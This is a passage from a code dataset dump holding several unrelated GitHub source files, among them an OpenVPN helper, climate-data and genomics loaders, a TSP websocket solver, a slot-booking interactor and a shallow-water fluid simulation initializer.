path.endswith('/'):\n path = path + '/'\n\n return path\n\n 
@staticmethod\n def is_valid_ipv4(ipv4):\n \"\"\"Check if IP is valid IPv4 address.\"\"\"\n if isinstance(ipv4, str) and len(ipv4.strip()) > 6:\n return True\n return False\n\n @staticmethod\n def is_valid_hostname(hostname):\n \"\"\"Checks if specified hostname matches rules and returns boolean.\"\"\"\n if len(hostname) > 255 or len(hostname) < 1:\n return False\n return True\n\n @staticmethod\n def fetch_hostname_by_system():\n \"\"\"Fetches Fully Qualified Domain Name from system.\"\"\"\n return socket.getfqdn()\n\n @staticmethod\n def fetch_hostname_by_reverse_dns(ipv4=None):\n \"\"\"Tries to fetch hostname by reverse DNS lookup and returns it if possible.\"\"\"\n if ipv4 is None:\n ipv4 = SimplifiedOpenvpnHelper.fetch_external_ipv4()\n if ipv4:\n return socket.gethostbyaddr(ipv4)\n return None\n\n @staticmethod\n def fetch_external_ipv4():\n \"\"\"Fetches and returns external IPv4 address.\"\"\"\n ipv4 = get('http://api.ipify.org').text\n if ipv4:\n return ipv4.strip()\n return None\n\n @staticmethod\n def generate_share_hash(slug, sovpn_share_salt=''):\n \"\"\"Calculates and return SOVPN share hash for specified slug.\"\"\"\n feed = (sovpn_share_salt + slug).encode('utf-8')\n share_hash = hashlib.sha1(feed).hexdigest()\n return share_hash\n","repo_name":"rudissaar/simplified-openvpn","sub_path":"simplified_openvpn_helper.py","file_name":"simplified_openvpn_helper.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"22885442412","text":"\"\"\"\nThis script is used to process downloaded historic normal data from PRISM. \n~~~~~~~~~~~~~~~~~~~~\nAuthor: Cindy Chiao\nLast Edit Date: 04/19/2016\n\nObtained historic climate normals from PRISM project\nhttp://www.prism.oregonstate.edu/documents/PRISM_datasets.pdf\nhttp://www.prism.oregonstate.edu/normals/\n\"\"\"\nimport subprocess\nimport numpy as np\n\n# Setting local variables\nvariables = ['ppt', 'tmean']\nfolder = '../data/normals/'\ngrid = '../data/mask.nc'\n\nbase_fname = 'PRISM_{var}_30yr_normal_4kmM2_all_asc/PRISM_{var}_30yr_normal_4kmM2_{m:02d}_asc.asc'\nbase_nc_name = '{var}.{m:02d}.nc'\n# the version of gdal to be used\ngdal = '/opt/local/bin/gdal_translate'\n\nmonths = np.arange(1, 13)\n\n# Use gdal to translate the ascii data into netCDF format\n# Use CDO to merge monthly data into 1 file\nfor var in variables:\n files = []\n for month in months:\n subprocess.call([gdal, '-of', 'netCDF', \n folder+base_fname.format(var=var, m=month), \n folder+base_nc_name.format(var=var, m=month)])\n files.append(folder+base_nc_name.format(var=var, m=month))\n subprocess.call(['cdo', 'merge', ' '.join(files), folder+'{var}.monthly.nc'.format(var=var)])\n for f in files:\n subprocess.call(['rm', f])\n\n# Use CDO to remap PRISM data into the grid file used for this project\nsubprocess.call(['cdo', 'remapcon,{grid}'.format(grid=grid), \n folder+'ppt.monthly.nc', folder+'ppt.monthly.mask.nc'])\n\nsubprocess.call(['cdo', 'remapbil,{grid}'.format(grid=grid), \n folder+'tmean.monthly.nc', folder+ 'tmean.monthly.mask.nc'])","repo_name":"tcchiao/fall-foliage-finder","sub_path":"src/process_prism.py","file_name":"process_prism.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"32605286656","text":"import os\nimport glob\nfrom biothings.hub.dataload.uploader import ParallelizedSourceUploader\nfrom hub.dataload.uploader import 
SnpeffPostUpdateUploader\nfrom .wellderly_parser import WellderlyTsvReader\n\n\nclass WellderlyUploader(ParallelizedSourceUploader, SnpeffPostUpdateUploader):\n \"\"\"Data originally coming from: http://www.stsiweb.org/wellderly\"\"\"\n\n name = \"wellderly\"\n\n __metadata__ = {\n \"mapper\": 'observed',\n \"assembly\": \"hg19\",\n \"src_meta\": {\n \"url\": \"https://www.scripps.edu/science-and-medicine/translational-institute/translational-research/genomic-medicine/wellderly\",\n \"license_url\": \"https://redcapstsi.scripps.edu/redcap/surveys/?s=NT4N7A3KJD\",\n \"license_url_short\": \"https://bit.ly/32tpCvP\"\n }\n }\n\n def jobs(self):\n \"\"\"\n this method will be called by self.update_data() and then generate arguments for self.load.data() method,\n allowing parallelization\n \"\"\"\n tsv_filename_pattern = \"Wellderly.chr*.g.vcf.gz.tsv\"\n tsv_file_collection = glob.glob(os.path.join(self.data_folder, tsv_filename_pattern))\n\n assembly = self.__metadata__[\"assembly\"]\n\n return [(tsv_file, assembly) for tsv_file in tsv_file_collection]\n\n def load_data(self, file, assembly):\n \"\"\"load data from an input file\"\"\"\n self.logger.info(\"Load data from file {} (assembly: {})\".format(file, assembly))\n\n return WellderlyTsvReader.load_data(file, assembly)\n\n @classmethod\n def get_mapping(klass):\n mapping = {\n \"wellderly\": {\n \"properties\": {\n \"chrom\": {\n \"type\": \"text\",\n \"analyzer\": \"string_lowercase\"\n },\n \"pos\": {\n \"type\": \"long\"\n },\n \"hg19\": {\n \"properties\": {\n \"start\": {\n \"type\": \"integer\"\n },\n \"end\": {\n \"type\": \"integer\"\n }\n }\n },\n \"ref\": {\n \"type\": \"text\",\n \"analyzer\": \"string_lowercase\"\n },\n \"alt\": {\n \"type\": \"text\",\n \"analyzer\": \"string_lowercase\"\n },\n \"vartype\": {\n \"type\": \"text\",\n \"analyzer\": \"string_lowercase\"\n },\n \"alleles\": {\n \"properties\": {\n \"allele\": {\n \"type\": \"text\",\n \"analyzer\": \"string_lowercase\"\n },\n \"freq\": {\n \"type\": \"float\"\n }\n }\n }\n }\n }\n }\n return mapping\n","repo_name":"biothings/myvariant.info","sub_path":"src/hub/dataload/sources/wellderly/wellderly_upload.py","file_name":"wellderly_upload.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"48"} +{"seq_id":"12269346711","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 28 10:36:03 2018\n\n@author: Administrator\n\"\"\"\n\"\"\"\nfilename = ('filtered_words.txt')\ncontens = input(\"请输入内容:\")\n\nfor filter_word in open(filename):\n \n if filter_word.rstrip() in contens:#使用rstrip()去掉右边的跨行符\n filter_words.append(filter_word.rstrip()) \n print(filter_words) \n \n #filter_word.replace(, '*')\n #print(contens)\n \n # break\n#else:\n # print(\"Human Rights\")\n \n\"\"\"\n\n\"\"\"\nuser_input = input(\"请输入内容 :\")\nprint(user_input)\nfor filter_word in open('filtered_words.txt'):\n \n if filter_word.rstrip() in user_input:\n \n user_input.replace()\n print('Freedom')\n break\nelse:\n print('Human Rights')\n \n\"\"\"\n\n\"\"\"\nfiltered = []\n\ndef get_filtered_words():\n f = open()\n\n\"\"\"\n\n\n\nuser_input = input(\"请输入内容:\")\nfor filter_word in open('filtered_words.txt'):\n fw = filter_word.rstrip()\n if fw in user_input:\n fw_len = len(fw)\n user_input= user_input.replace(fw,'*'*fw_len)\n print(user_input)\n \n \n\n 
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"GeHaha/AboutPython","sub_path":"PythonDaily/PythonLearing/net_test/敏感词/敏感词替换.py","file_name":"敏感词替换.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38220968383","text":"import rospy\nfrom performance_tests.msg import SuperAwesome\n\ndef callback(data):\n rospy.loginfo(\"%s\", data.data)\n \ndef listener():\n rospy.init_node('Subscriber_Python', anonymous=True)\n rospy.Subscriber(\"SuperAwesome_Topic\", SuperAwesome, callback)\n rospy.spin()\n\nif __name__ == '__main__':\n listener()","repo_name":"cesar-vargas88/BOR_Performance","sub_path":"scripts/Subscriber.py","file_name":"Subscriber.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"194579619","text":"import tornado.httpserver\nimport tornado.websocket\nimport tornado.ioloop\nimport tornado.web\nimport json\nimport itertools\nimport math\n\nclass Coords:\n\n def __init__(self,coords,length):\n self.coords = coords\n self.length = float('%.7f' % length)\n\n def __eq__(self,other):\n index = -1\n\n for i in self.coords:\n if i[0] == other.coords[index][0] and i[1] == other.coords[index][1]:\n index-=1\n else:\n return False\n\n return True\n\n def __ne__(self,other):\n index = -1\n\n for i in self.coords:\n if i[0] == other.coords[index][0] and i[1] == other.coords[index][1]:\n return False\n else:\n index-=1\n\n return True\n\n def __lt__(self,other):\n if self.length < other.length:\n return True\n else:\n return False\n\n def __gt__(self,other):\n if self.length > other.length:\n return True\n else:\n return False\n\n def __hash__(self):\n return int(self.length * 1000000)\n\n def len(self):\n return self.length\n\n def route(self):\n return self.coords\n\ndef permutate(dataList):\n coord_list = []\n\n if(len(dataList) > 18):\n return \"0\"\n\n for i in range(0, len(dataList), 2):\n y_coord = dataList.pop()\n x_coord = dataList.pop()\n coord_list.append([x_coord,y_coord])\n\n coord_sub_list = coord_list[1:]\n\n perms = itertools.permutations(coord_sub_list)\n\n distances = []\n perms_list = []\n coords_obj_list = []\n\n for i in perms:\n perms_list.append(i)\n summa = calculate_distances(i)\n summa_2 = calculate_distances_to_first_node(i,coord_list)\n distances.append(summa+summa_2)\n coords_obj_list.append(Coords(i,summa+summa_2))\n\n coords_obj_list.sort()\n\n unique_list = list(set(coords_obj_list))\n unique_list.sort()\n\n min_path = []\n min_path_2 = []\n\n min_path = list(unique_list[0].route())\n min_path_length = unique_list[0].len()\n min_path.insert(0,coord_list[0])\n min_path.append(coord_list[0])\n\n if(len(unique_list) > 1):\n min_path_2 = list(unique_list[1].route())\n min_path_2_length = unique_list[1].len()\n min_path_2.insert(0,coord_list[0])\n min_path_2.append(coord_list[0])\n\n if(len(min_path_2) > 1):\n min_path += min_path_2\n min_path.insert(0,1) #array to be returned contains both shortest and 2nd shortest paths\n else:\n min_path.insert(0,0) #array to be returned contains only shortest path\n\n return json.dumps(min_path)\n\ndef calculate_distances(list_of_coords):\n sum = 0\n for x in range(1, len(list_of_coords)):\n sum += calculate_distance(list_of_coords[x-1],list_of_coords[x])\n return sum\n\ndef calculate_distance(lista1,lista2):\n delta_x = lista1[0] - lista2[0]\n delta_y = lista1[1] - lista2[1]\n return math.sqrt( 
math.pow(delta_x, 2) + math.pow(delta_y, 2))\n\ndef calculate_distances_to_first_node(route,coords):\n first_node = coords[0]\n route_head = route[0]\n route_tail = route[-1]\n from_first_node_to_head = calculate_distance(first_node,route_head)\n from_first_node_to_tail = calculate_distance(first_node,route_tail)\n sum = from_first_node_to_head + from_first_node_to_tail\n return sum\n\nclass WSHandler(tornado.websocket.WebSocketHandler):\n\n def check_origin(self, origin):\n return True\n\n def open(self):\n print('User is connected.')\n\n def on_message(self, message):\n obj = json.loads(message)\n self.write_message(permutate(obj))\n\n def on_close(self):\n print('Connection closed.')\n\n#Uncomment following line if you are providing only the web socket interface and not serving static files with Tornado\napplication = tornado.web.Application([(r'/tsp', WSHandler),])\n\n#Uncomment following line if you are providing both the web socket interface and static file serving with Tornado\n#application = tornado.web.Application([(r'/tsp', WSHandler),(r\"/content/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"/var/www/visual-tsp\"})])\n\nif __name__ == \"__main__\":\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(9999)\n print('Server listening on port 9999')\n tornado.ioloop.IOLoop.instance().start()\n","repo_name":"jutunen/visual-TSP","sub_path":"servers/python/tsp-solver.py","file_name":"tsp-solver.py","file_ext":"py","file_size_in_byte":4164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44396810263","text":"import pytest\nfrom sqlmodel import select\n\nfrom app.core.reports.models import Job, Report\n\nMUTATION_DELETE_REPORT = \"\"\"\nmutation DeleteReport($reportId: Int!) 
{\n deleteReport (reportId: $reportId) {\n errors {\n code\n message\n field\n }\n }\n}\n\"\"\"\n\n\n@pytest.mark.asyncio\nasync def test_delete_report(\n db_session, graphql, orders_report, export_orders_job, products_report\n):\n # given\n variables = {\"reportId\": orders_report.id}\n\n # when\n result = await graphql.execute(MUTATION_DELETE_REPORT, variables)\n\n # then\n assert result[\"data\"][\"deleteReport\"][\"errors\"] == []\n assert (\n await db_session.exec(select(Report).where(Report.id == orders_report.id))\n ).first() is None\n assert (\n await db_session.exec(select(Job).where(Job.report_id == orders_report.id))\n ).first() is None\n assert (\n await db_session.exec(select(Job).where(Job.report_id == products_report.id))\n ).first() is None\n\n\n@pytest.mark.asyncio\nasync def test_delete_not_found(db_session, graphql):\n # given\n variables = {\"reportId\": -1}\n\n # when\n result = await graphql.execute(MUTATION_DELETE_REPORT, variables)\n\n # then\n error = result[\"data\"][\"deleteReport\"][\"errors\"][0]\n assert error[\"code\"] == \"NOT_FOUND\"\n assert error[\"field\"] == \"reportId\"\n","repo_name":"SaleorIntegrations/saleor-app-export","sub_path":"app/graphql/reports/tests/test_delete_report.py","file_name":"test_delete_report.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5004665543","text":"import torch\nimport os\nimport random\nimport numpy as np\n\n\ndef seed_all(seed: int = 1930):\n \"\"\"Seed all random number generators.\"\"\"\n print(\"Using Seed Number {}\".format(seed))\n\n os.environ[\"PYTHONHASHSEED\"] = str(\n seed\n ) # set PYTHONHASHSEED env var at fixed value\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.cuda.manual_seed(seed) # pytorch (both CPU and CUDA)\n np.random.seed(seed) # for numpy pseudo-random generator\n random.seed(seed) # set fixed value for python built-in pseudo-random generator\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.enabled = False\n\n\ndef seed_worker(_worker_id):\n \"\"\"Seed a worker with the given ID.\"\"\"\n worker_seed = torch.initial_seed() % 2 ** 32\n np.random.seed(worker_seed)\n random.seed(worker_seed)\n","repo_name":"ghnreigns/SHOPEE","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10951088003","text":"from datetime import datetime\nfrom slot_booking.interactors.storages.user_slot_storage_interface \\\n import UserSlotStorageInterface\nfrom slot_booking.interactors.storages.washing_machine_slot_storage_interface \\\n import WashingMachineSlotStorageInterface\nfrom slot_booking.interactors.storages.configure_slot_storage_interface \\\n import ConfigureSlotStorageInterface\n\nfrom slot_booking.interactors.presenters.presenter_interface import \\\n PresenterInterface\n\nfrom slot_booking.constants.enums import Day\nimport time\n\nclass BookASlotInteractor:\n\n def __init__(self,\n washing_machine_slot_storage: WashingMachineSlotStorageInterface,\n user_slot_storage: UserSlotStorageInterface,\n configure_slot_storage: ConfigureSlotStorageInterface,\n presenter: PresenterInterface\n ):\n\n self.washing_machine_slot_storage = washing_machine_slot_storage \n self.user_slot_storage = user_slot_storage\n self.configure_slot_storage = configure_slot_storage\n self.presenter = 
presenter\n\n\n def _valid_date_details(self, user_id: int, date: str):\n\n present_date = datetime.now().date()\n\n is_not_valid_date_to_book = date < present_date\n# print(present_date, is_not_valid_date_to_book, date)\n if is_not_valid_date_to_book:\n self.presenter.raise_exception_for_invalid_date()\n return False\n\n book_no_of_days_after = \\\n self.configure_slot_storage.book_no_of_days_after()\n\n\n user_last_used_date = self.user_slot_storage.last_used_date(\n user_id\n )\n\n# print(book_no_of_days_after, user_last_used_date)\n is_user_cannot_book_in_date = False\n if user_last_used_date:\n diff_in_days = present_date - user_last_used_date\n is_user_cannot_book_in_date = \\\n book_no_of_days_after>=diff_in_days.days\n\n #print(\"22\"*2, user_last_used_date)\n if is_user_cannot_book_in_date:\n self.presenter.raise_exception_for_cannot_book_in_date()\n return \n\n return True\n\n\n def _get_day(self, date: str):\n days = [day.value for day in Day]\n\n day = date.strftime(\"%A\")\n print(day, days)\n no_slots_in_given_date = day not in days\n if no_slots_in_given_date:\n self.presenter.raise_exception_for_no_slots_in_given_date()\n return False\n\n return day\n\n\n def _valid_time_slots(self, day: str, start_time: str, end_time: str):\n\n washing_machines_ids = \\\n self.washing_machine_slot_storage.washing_machines_in_given_slot(\n day, start_time, end_time\n )\n# print(day, start_time, end_time, washing_machines_ids)\n no_washing_machine_slots = not washing_machines_ids\n if no_washing_machine_slots:\n self.presenter.raise_exception_for_invalid_time_slot()\n return False\n\n return washing_machines_ids\n\n\n def book_a_slot(self, user_id: int, date: str, start_time: str, \n end_time: str):\n\n print(\"a\"*20, \"login\")\n not_valid_date_details_to_book = not self._valid_date_details(\n user_id=user_id, date=date)\n\n if not_valid_date_details_to_book:\n return\n\n\n day = self._get_day(date=date)\n invalid_day = not day\n #print(\"b\"*20, not_valid_date_details_to_book, invalid_day)\n if invalid_day:\n return\n print(\"b\"*20, not_valid_date_details_to_book, invalid_day)\n\n washing_machines_ids = self._valid_time_slots(day=day, \n start_time=start_time, end_time=end_time\n )\n\n invalid_time_slots = not washing_machines_ids\n\n if invalid_time_slots:\n return \n\n\n slot_booked = self.user_slot_storage.create_user_slot(\n user_id, date, start_time, end_time, washing_machines_ids\n )\n\n print(\"33\")\n if slot_booked:\n slot_response = self.presenter.get_response_for_slot_booked()\n else:\n slot_response = \\\n self.presenter.get_response_for_unavailable_washing_machines()\n\n return slot_response\n\n","repo_name":"PUNEETH21/slot_booking","sub_path":"slot_booking/interactors/book_a_slot_interactor.py","file_name":"book_a_slot_interactor.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21488033142","text":"import pymongo\n\n\nclass MongoClient:\n\n def __init__(self, host, port):\n self._client = pymongo.MongoClient(host=host, port=port)\n self._db = self._client.engblog\n\n def insert_blog(self, blog):\n doc = self._db.blogs.find_one({'url': blog.get('url')})\n if doc is not None:\n return False\n\n self._db.blogs.insert(blog)\n return True\n\n def insert_company(self, company):\n self._db.companies.update_one(\n {'company': company},\n {\"$set\": {'company': company}},\n upsert=True\n 
)\n","repo_name":"jfwwlong/engblog-spider","sub_path":"mongo.py","file_name":"mongo.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29328014071","text":"from browser import document, html, window, timer, bind\nfrom breact.baseclasses import *\n\n\n'''\nHTML4 tags : A, ABBR, ACRONYM, ADDRESS, APPLET, AREA, B, \nBASE, BASEFONT, BDO, BIG, BLOCKQUOTE, BODY, BR, BUTTON, \nCAPTION, CENTER, CITE, CODE, COL, COLGROUP, DD, DEL, DFN,\n DIR, DIV, DL, DT, EM, FIELDSET, FONT, FORM, FRAME, FRAMESET, \n H1, H2, H3, H4, H5, H6, HEAD, HR, HTML, I, IFRAME, IMG, INPUT, \n INS, ISINDEX, KBD, LABEL, LEGEND, LI, LINK, MAP, MENU, META, \n NOFRAMES, NOSCRIPT, OBJECT, OL, OPTGROUP, OPTION, P, PARAM, \n PRE, Q, S, SAMP, SCRIPT, SELECT, SMALL, SPAN, STRIKE, STRONG, \n STYLE, SUB, SUP, SVG, TABLE, TBODY, TD, TEXTAREA, TFOOT, TH, \n THEAD, TITLE, TR, TT, U, UL, VAR\nHTML5 tags : ARTICLE, ASIDE, AUDIO, BDI, CANVAS, COMMAND, DATA, \nDATALIST, EMBED, FIGCAPTION, FIGURE, FOOTER, HEADER, KEYGEN, MAIN, \nMARK, MATH, METER, NAV, OUTPUT, PROGRESS, RB, RP, RT, RTC, RUBY, \nSECTION, SOURCE, SUMMARY, TEMPLATE, TIME, TRACK, VIDEO, WBR\nHTML5.1 tags : DETAILS, DIALOG, MENUITEM, PICTURE, SUMMARY\nIn the following link you can find the index of HTML tags with references (DRAFT).\n'''\n\n\n\n\n#tickers\nclass Ticker(StatefulSegment):\n def __init__(self):\n self.oi = GenerateContainers()\n self.state = {\"tick\": 0, \"tock\": 0}\n def update(self, one_state_change=False):\n stfulComp = group(html.DIV(), [\n html.H2(self.state[\"tick\"]),\n html.H2(self.state[\"tock\"])\n ])\n def increment():\n self.setState({\n \"tick\":self.state[\"tick\"]+1, \n \"tock\":self.state[\"tock\"]-1\n })\n \n if not one_state_change:\n print(\"set time out\")\n timer.set_timeout(increment, 1000)\n return stfulComp\n\n\nclass TickerWithDescription(Base):\n def render(self):\n app = html.DIV()\n tk = Ticker()\n # app <= tk.render()\n\n btn = html.BUTTON(\"click me to reset\")\n @bind(btn, \"click\")\n def reset(e):\n tk.setState({\"tick\":0, \"tock\":0}, True)\n # app <= btn\n\n app = group(app, [\n tk.render(), btn\n ])\n return app\n\n\n#text field \nclass AffectedByTextField(StatefulSegment):\n def __init__(self):\n self.oi = GenerateContainers()\n self.state = {\"text\": \"d\"}\n def update(self, one_state_change=False):\n return html.H1(self.state[\"text\"].replace(\"<\", \"<\"))\n\nclass TextField(Base):\n def __init__(self, title):\n self.title = title\n def render(self):\n app = html.DIV()\n\n aft = AffectedByTextField()\n input = html.INPUT(type=\"text\")\n \n \n @bind(input, \"keyup\")\n def update(e):\n aft.setState({\"text\": e.target.value})\n\n app = group(app, [\n html.H1(self.title),\n aft.render(),\n input\n ])\n # app <= aft.render()\n # app <= input\n return app\n\n\n#thing that makes me happy because it uses group a lot!\nclass WithGroups(Base):\n def render(self):\n app = group(html.DIV(), [\n html.H1(\"HI THERE!\"),\n html.H2(\"GOOD TO SEE YOU!\"),\n html.P(\"Some things about me:\"),\n html.UL(\n [\n html.LI(\"I am\"),\n html.LI(\"Does this work\")\n ]\n ),\n html.H2(\"here is a nice little ticker\"),\n TickerWithDescription().render(),\n TextField(\"here is a prop being passed\").render()\n ])\n return app\n\n# app = html.DIV(id=\"hithere\")\n\n\n# # app <= html.H1(\"hi there\", id=\"what\")\n# thing = group(app, [WithGroups().render()])\n# # thing = app\n# document[\"root\"] <= thing\n# thid = document[\"hithere\"]\n# 
thid.innerHTML = \"hedy\"\n# print(document.getElementById(\"hithere\").innerHTML)\n# document[\"what\"] <= html.H1(\"buy\")","repo_name":"dewball345/breact-example","sub_path":"fbhosting/pages/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"42636382803","text":"# initializer.py is part of MattFlow\n#\n# MattFlow is free software; you may redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation, either version 3 of the License, or (at your\n# option) any later version. You should have received a copy of the GNU\n# General Public License along with this program. If not, see\n# .\n#\n# (C) 2019 Athanasios Mattas\n# ======================================================================\n\"\"\"Handles the initialization of the simulation.\"\"\"\n\n# x\n# 0 1 2 3 4 5 6 7 8 9\n# 0 G G G G G G G G G G\n# 1 G G G G G G G G G G\n# 2 G G - - - - - - G G\n# 3 G G - - - - - - G G\n# y 4 G G - - - - - - G G\n# 5 G G - - - - - - G G\n# 6 G G - - - - - - G G\n# 7 G G - - - - - - G G\n# 8 G G G G G G G G G G\n# 9 G G G G G G G G G G\n\n\nimport os\nfrom random import randint, uniform\n\nimport numpy as np\nfrom numpy.lib.format import open_memmap\n\nfrom mattflow import config as conf, dat_writer, logger, utils\n\n\ndef _variance():\n \"\"\"Returns the drop-variance used at the different simulation modes.\n\n Use small variance (but > 0.0004) to make the distribution steep and sharp,\n for a better representation of a drop.\n \"\"\"\n variance = {\n \"drop\": randint(5, 8) / 10000,\n \"drops\": randint(5, 8) / 10000,\n \"rain\": 0.0002\n }\n return variance[conf.MODE]\n\n\ndef _drop_heights_multiplier():\n \"\"\"Adjusts the size of the drop, regarding the simulation mode.\"\"\"\n # multiply with 4 / 3 for a small stone droping\n # with 1 / 4 for a water drop with a considerable momentum build\n # with 1 / 6 for a soft water drop\n if conf.MODE == 'drop' or conf.MODE == 'drops':\n factor = randint(6, 12) / 10\n elif conf.MODE == 'rain':\n factor = 1 / 6\n else:\n print(\"Configure MODE | options: 'drop', 'drops', 'rain'\")\n return factor\n\n\ndef _gaussian(variance, drops_count=None):\n '''Populates the mesh with a bivariate gaussian distribution of a certain\n variance.\n\n formula: amplitude * np.exp(-exponent)\n\n Args:\n variance (float) : target variance of the distribution\n drops_count(int) : drop counter\n\n Returs:\n gaussian_distribution (2D array)\n '''\n # random pick of drop center coordinates\n # (mean or expectation of the gaussian distribution)\n if conf.RANDOM_DROP_CENTERS:\n drop_cx = uniform(conf.MIN_X, conf.MAX_X)\n drop_cy = uniform(conf.MIN_Y, conf.MAX_Y)\n else:\n drop_cx = conf.DROPS_CX[drops_count % 10]\n drop_cy = conf.DROPS_CY[drops_count % 10]\n\n # grid of the cell centers\n CX, CY = np.meshgrid(conf.CX, conf.CY)\n\n amplitude = 1 / np.sqrt(2 * np.pi * variance)\n exponent = \\\n ((CX - drop_cx)**2 + (CY - drop_cy)**2) / (2 * variance)\n\n gaussian_distribution = amplitude * np.exp(-exponent)\n return gaussian_distribution\n\n\ndef _drop_heights_correction(drop_heights, divisor=2):\n \"\"\"Subtracts the fluid volume that the drop adds to the domain.\n\n For a few thousands of iterations the fluid level rises quite subtly, but\n after a point the volume adds up to be significant.\n\n Args:\n drop_heights (2D array) : the gaussian distribution modeling the drop\n divisor 
(int) : divides the correction, resulting to smoother\n correction steps\n\n Returns:\n drop_correction (float) : the extra fluid volume of the drop,\n distributed to the whole domain, divided\n by a divisor for a smoother transition\n to the next time_step\n \"\"\"\n return drop_heights.sum() / drop_heights.size / divisor\n\n\ndef drop(h_hist, drops_count=None):\n \"\"\"Generates a drop.\n\n Drop is modeled as a bivariate gaussian distribution.\n\n Args:\n h_hist (array) : the 0th state variable, U[0, :, :]\n drops_count(int) : drop counter\n\n Returns:\n h_hist(2D array) : drop is added to the input h_hist\n \"\"\"\n variance = _variance()\n drop_heights = (_drop_heights_multiplier()\n * _gaussian(variance, drops_count))\n drop_correction = _drop_heights_correction(drop_heights)\n h_hist += drop_heights - drop_correction\n return h_hist\n\n\ndef _init_U():\n \"\"\"Creates and initializes the state-variables 3D matrix, U.\"\"\"\n cx = conf.CX\n cy = conf.CY\n U = np.zeros((utils.U_shape()), dtype=conf.DTYPE)\n # 1st drop\n U[0, :, :] = conf.SURFACE_LEVEL + drop(U[0, :, :], drops_count=1)\n # Write a .dat file (default: False)\n if conf.WRITE_DAT:\n dat_writer.writeDat(U[0, conf.Ng: -conf.Ng, conf.Ng: -conf.Ng],\n time=0, it=0)\n from mattflow import mattflow_post\n mattflow_post.plotFromDat(time=0, it=0)\n elif not conf.WRITE_DAT:\n pass\n else:\n print(\"Configure WRITE_DAT | Options: True, False\")\n return U\n\n\ndef _init_h_hist(U):\n \"\"\"Creates and initializes h_hist, which holds the stepwise height data.\n\n - holds the states of the fluid for post-processing\n - saving frames every iters\n \"\"\"\n # Number of integer divisions with the freq, times the consecutive frames,\n # plus the consecutive frames that we can take from the remainder of the\n # division.\n num_states_to_save = (\n conf.MAX_ITERS\n // conf.FRAME_SAVE_FREQ\n * conf.FRAMES_PER_PERIOD\n + min(conf.MAX_ITERS % conf.FRAME_SAVE_FREQ, conf.FRAMES_PER_PERIOD)\n )\n h_hist = np.zeros((num_states_to_save, conf.Nx, conf.Ny), dtype=conf.DTYPE)\n h_hist[0] = U[0, conf.Ng: -conf.Ng, conf.Ng: -conf.Ng]\n return h_hist\n\n\ndef _init_U_ds(U): # pragma: no cover\n \"\"\"Creates and initializes U_ds, which holds stepwise data for ML.\"\"\"\n dss = utils.ds_shape()\n ds_name = f\"mattflow_data_{dss[0]}x{dss[1]}x{dss[2]}x{dss[3]}.npy\"\n U_ds = open_memmap(os.path.join(os.getcwd(), ds_name),\n mode='w+',\n dtype=conf.DTYPE,\n shape=dss)\n U_ds[0] = U[:, conf.Ng: - conf.Ng, conf.Ng: - conf.Ng]\n return U_ds\n\n\ndef initialize():\n \"\"\"Wrapper that initializes all necessary data structures.\n\n Returns\n U (3D array) : the state-variables-3D-matrix (populating a x,y grid)\n - shape: (3, Nx + 2 * Ng, Ny + 2 * Ng)\n - U[0] : state varables [h, hu, hv]\n - U[1] : y dimention (rows)\n - U[2] : x dimention (columns)\n h_hist (array) : holds the step-wise height solutions for the\n post-processing animation\n t_hist (array) : holds the step-wise times for the post-\n processing animation\n U_ds (memmap) : holds the state-variables 3D matrix data for all\n the timesteps\n (conf.MAX_ITERS, 3, Nx + 2 * Ng, Ny + 2 * Ng)\n \"\"\"\n logger.log('Initialization...')\n\n U = _init_U()\n h_hist = _init_h_hist(U)\n t_hist = np.zeros(len(h_hist), dtype=conf.DTYPE)\n if conf.SAVE_DS_FOR_ML:\n U_ds = _init_U_ds(U)\n else:\n U_ds = None\n return U, h_hist, t_hist, 
